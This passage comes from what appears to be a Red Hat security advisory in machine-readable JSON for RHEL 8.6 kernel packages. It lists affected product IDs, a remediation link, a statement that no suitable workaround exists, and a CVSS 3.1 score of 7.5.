            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.TUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.TUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
          ],
          "restart_required": {
            "category": "machine"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:5691"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "BaseOS-8.6.0.Z.AUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.AUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.AUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-aarch64-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-ppc64le-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-s390x-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.TUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.TUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "BaseOS-8.6.0.Z.AUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.AUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.AUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-aarch64-0:4.18.0-372.185.1.el8_6.aarch64",
